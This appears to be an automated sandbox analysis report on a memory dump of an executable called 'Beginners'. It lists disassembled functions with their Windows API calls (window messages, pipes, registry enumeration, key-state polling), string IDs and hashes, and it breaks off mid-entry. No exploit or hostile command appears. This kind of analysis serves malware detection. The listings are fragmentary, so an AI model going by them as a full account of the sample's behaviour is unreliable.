                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: f452c6407574ba390644967018d1bdfffb1f0e702c18cb6fde86b03777ea6145
                                          • Instruction ID: ff327714efe8c1019da8efe3aae17dcbaf9b1d17daa3e66bc51c4b654a4e835b
                                          • Opcode Fuzzy Hash: f452c6407574ba390644967018d1bdfffb1f0e702c18cb6fde86b03777ea6145
                                          • Instruction Fuzzy Hash: A0213772A01104BFDB14EBA0DC96DFFBB78DF46360F108119F8A5A72E3DB74490A8620
                                          Function 00136A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
                                            • Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
                                            • Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00136A86
                                          • LoadLibraryW.KERNEL32(?), ref: 00136A8D
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00136AA2
                                          • DestroyWindow.USER32(?), ref: 00136AAA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: 8c96171963d7e206fa4e7546b08ee11ab748589b10c1b29a1d5852a0785fe14a
                                          • Instruction ID: 6b6db943ae70602dcdff4c117dbd0947de20184cdc3cd346894db5526302d4ba
                                          • Opcode Fuzzy Hash: 8c96171963d7e206fa4e7546b08ee11ab748589b10c1b29a1d5852a0785fe14a
                                          • Instruction Fuzzy Hash: EE216D75204205BFEF118F64DC81EBB77ADEB59364F10CA19FA51A31A0D371DC9197A0
                                          Function 00117357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00117377
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001173AA
                                          • GetStdHandle.KERNEL32(0000000C), ref: 001173BC
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001173F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: ac98b08d03eefa1b36b87cc5b4b4d092508ecc55d66560da80efb964f142ca33
                                          • Instruction ID: 92168df63e193c47f9d77170723df3b082697ce37c244c43096dcb517766580e
                                          • Opcode Fuzzy Hash: ac98b08d03eefa1b36b87cc5b4b4d092508ecc55d66560da80efb964f142ca33
                                          • Instruction Fuzzy Hash: B4217C74508206ABDB288F69DC45ADA7BB4BF55720F204A29FDA1D73E0D7B09890DB60
                                          Function 00117425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00117444
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00117476
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00117487
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001174C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: f3422e42a2992df62468ecf61771c69237f056196e502c87b8116b923dc1ad6f
                                          • Instruction ID: 36e9ff73c373221a563073076822f090c5f3999886394b90e617951243dcc8cb
                                          • Opcode Fuzzy Hash: f3422e42a2992df62468ecf61771c69237f056196e502c87b8116b923dc1ad6f
                                          • Instruction Fuzzy Hash: 4721B0356082069BDB289F699C44EDA7BB8AF55730F200A29F9A1D77D0DB7098D1CB50
                                          Function 0011B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0011B297
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0011B2EB
                                          • __swprintf.LIBCMT ref: 0011B304
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00140980), ref: 0011B342
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: 744a2f821f608e437d12002b7667200f53b380a873f5a3ea4a198b3dc70946a3
                                          • Instruction ID: bef30466f2436fbafbaaa6ad8f94e7a21ec17c742bb241880c81a19e04d8401e
                                          • Opcode Fuzzy Hash: 744a2f821f608e437d12002b7667200f53b380a873f5a3ea4a198b3dc70946a3
                                          • Instruction Fuzzy Hash: A5213335A00209AFCB10DFA5CC85EEEB7B8EF89714B104069F905E7392DB71EA55CB61
                                          Function 0010AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                            • Part of subcall function 0010AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0010AA6F
                                            • Part of subcall function 0010AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0010AA82
                                            • Part of subcall function 0010AA52: GetCurrentThreadId.KERNEL32 ref: 0010AA89
                                            • Part of subcall function 0010AA52: AttachThreadInput.USER32(00000000), ref: 0010AA90
                                          • GetFocus.USER32 ref: 0010AC2A
                                            • Part of subcall function 0010AA9B: GetParent.USER32(?), ref: 0010AAA9
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0010AC73
                                          • EnumChildWindows.USER32(?,0010ACEB), ref: 0010AC9B
                                          • __swprintf.LIBCMT ref: 0010ACB5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                          • String ID: %s%d
                                          • API String ID: 1941087503-1110647743
                                          • Opcode ID: 9f8b74317936fd7b1cab0b721162f62e013028792bf1f2e91c27051c0eec6636
                                          • Instruction ID: 47a067c6d6dbb3ffcce19d4e677d9b7d8dc35c9d53021f552ab83509fae7d358
                                          • Opcode Fuzzy Hash: 9f8b74317936fd7b1cab0b721162f62e013028792bf1f2e91c27051c0eec6636
                                          • Instruction Fuzzy Hash: C8119D75600305ABDF11BFA0DE85FEA376CAF49710F004079BE89AA193DBB059499B72
                                          Function 001122E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00112318
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 3964851224-769500911
                                          • Opcode ID: c0acd790e7cb17321b5f4c41f5d982141f45e9cc8200e0811d3538750d6235f8
                                          • Instruction ID: d74075cc9ed85aec981b581fbbf0e1f2ede89636e1d009765f6cd8d71056e85d
                                          • Opcode Fuzzy Hash: c0acd790e7cb17321b5f4c41f5d982141f45e9cc8200e0811d3538750d6235f8
                                          • Instruction Fuzzy Hash: ED118E309102189FCF04EF94D9919EEB3B4FF2A304F10406AE824A7362EB325E56DF50
                                          Function 0012F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0012F2F0
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0012F320
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0012F453
                                          • CloseHandle.KERNEL32(?), ref: 0012F4D4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 86025a34002306d791c15228b47d88ddbf8bf31ca2f0c6005460fcfe403a155e
                                          • Instruction ID: 46c53f8b0a74348f2738ccd6a084152685829792b0440f5ca43ce5491d7a36b8
                                          • Opcode Fuzzy Hash: 86025a34002306d791c15228b47d88ddbf8bf31ca2f0c6005460fcfe403a155e
                                          • Instruction Fuzzy Hash: 76819F716007109FD724EF28D886BAAB7E5AF48710F14882DF9999B2D3D7B0ED41CB91
                                          Function 00130697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013075D
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013079C
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001307E3
                                          • RegCloseKey.ADVAPI32(?,?), ref: 0013080F
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013081C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: 1d14f35a566571b949d7c909d8e03a890ce0f791b34decbd872c8eb67ecee66b
                                          • Instruction ID: aa2a547c2ab3f1bc214739eebc527d88ae7feb0f97a62ce2399caefd7d109905
                                          • Opcode Fuzzy Hash: 1d14f35a566571b949d7c909d8e03a890ce0f791b34decbd872c8eb67ecee66b
                                          • Instruction Fuzzy Hash: C6516831208204AFC715EF64C891FAEB7E9FF89304F00892DF595872A2DB31E905CB92
                                          Function 0011EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0011EC62
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0011EC8B
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0011ECCA
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0011ECEF
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0011ECF7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: 903bb5fe72e4bacc92411dc419b04530c05a1fa6b73d6075871ea0834c5f1636
                                          • Instruction ID: 84c6fe9ca1ce6d3519eff03eca76d25e5294b460d7daf2b042f05efec08351dc
                                          • Opcode Fuzzy Hash: 903bb5fe72e4bacc92411dc419b04530c05a1fa6b73d6075871ea0834c5f1636
                                          • Instruction Fuzzy Hash: 3D512A35A00205DFCB05EFA4C985EADBBF5EF09310B148099E949AB3A2CB31AD51DB61
                                          Function 0013A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cbd4da05529848ac33db953f0b31f2fb6e8fba61b95b5339ff17bd7b9a5247f
                                          • Instruction ID: f047d81084e68f6b2fecf06022106e1f5fc704bb358f74e3faf7c28d560d0ab0
                                          • Opcode Fuzzy Hash: 5cbd4da05529848ac33db953f0b31f2fb6e8fba61b95b5339ff17bd7b9a5247f
                                          • Instruction Fuzzy Hash: 62412679904114AFD714CF28CCC8FA9BBB8EF0A350F950265F99AA72E1C7319D41DB51
                                          Function 000B2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 000B2727
                                          • ScreenToClient.USER32(001777B0,?), ref: 000B2744
                                          • GetAsyncKeyState.USER32(00000001), ref: 000B2769
                                          • GetAsyncKeyState.USER32(00000002), ref: 000B2777
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 91dc562d54bd8a5c481359d109223c40db8f282cc6cd2fd7df9e7a905dfbea88
                                          • Instruction ID: 1d260ba44b45e657587394e1efa4591293653cc9984b96bcfd0b9f086a5a19d5
                                          • Opcode Fuzzy Hash: 91dc562d54bd8a5c481359d109223c40db8f282cc6cd2fd7df9e7a905dfbea88
                                          • Instruction Fuzzy Hash: 05418375508109FFDF259F69C844EEDBBB4FB05324F10831AF825A6290CB319E91DB91
                                          Function 001095D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 001095E8
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00109692
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0010969A
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 001096A8
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001096B0
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: 4dfc38015b94dd4436f7e4b22de8602093732f25fbbab52560e0281315c53608
                                          • Instruction ID: 4ea0be54a937333d4c06b4fe50ba963f8428bc17f772af433a2e5313da731acf
                                          • Opcode Fuzzy Hash: 4dfc38015b94dd4436f7e4b22de8602093732f25fbbab52560e0281315c53608
                                          • Instruction Fuzzy Hash: 0F31EC71900219EFDB14CFA8D94CAEE3BB5FB49315F104228F965AB2E1C3B19960CB90
                                          Function 0013B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0013B804
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0013B829
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0013B841
                                          • GetSystemMetrics.USER32(00000004), ref: 0013B86A
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0012155C,00000000), ref: 0013B888
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: 669ae5ee5956972964501c55512cd9396e43e0b2d3243c159a14bdd0c210e388
                                          • Instruction ID: 281e749bf95442e9b529d176934ab83df50a42fb423f82d05eef5e5fce22509d
                                          • Opcode Fuzzy Hash: 669ae5ee5956972964501c55512cd9396e43e0b2d3243c159a14bdd0c210e388
                                          • Instruction Fuzzy Hash: D321B531918215AFCB149F39DC48B6A3BA8FB09320F154778FB25D75E0E7308950CB80
                                          Function 00126138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00126159
                                          • GetForegroundWindow.USER32 ref: 00126170
                                          • GetDC.USER32(00000000), ref: 001261AC
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 001261B8
                                          • ReleaseDC.USER32(00000000,00000003), ref: 001261F3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          • Opcode ID: 4538c2d9ebf214fe222307104c24b964e0f559389fe4e2835c77d34f6fa87870
                                          • Instruction ID: 9329e3baaddd1e002c3b5ec285df1a060a63e5b338cc8ea9546fe63369a445b4
                                          • Opcode Fuzzy Hash: 4538c2d9ebf214fe222307104c24b964e0f559389fe4e2835c77d34f6fa87870
                                          • Instruction Fuzzy Hash: 9521A475A002149FD704EF65DC88A9ABBF5EF89311F048479F94A97662CB30AC50CB90
                                          Function 000B16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
                                          • SelectObject.GDI32(?,00000000), ref: 000B1738
                                          • BeginPath.GDI32(?), ref: 000B174F
                                          • SelectObject.GDI32(?,00000000), ref: 000B1778
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: 5789e3cc029aa89bf62160c01ddafa3dd2e1098520e99a4a8546bed01c45ae6c
                                          • Instruction ID: 31a7e8618555ee531b0c522995862909f368605659133e0887ca0e945ae351f4
                                          • Opcode Fuzzy Hash: 5789e3cc029aa89bf62160c01ddafa3dd2e1098520e99a4a8546bed01c45ae6c
                                          • Instruction Fuzzy Hash: FB219D30808208EFDB119F65EC48BE97BF9EB01361F544226F919A79F1D77098E1CB92
                                          Function 0010C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
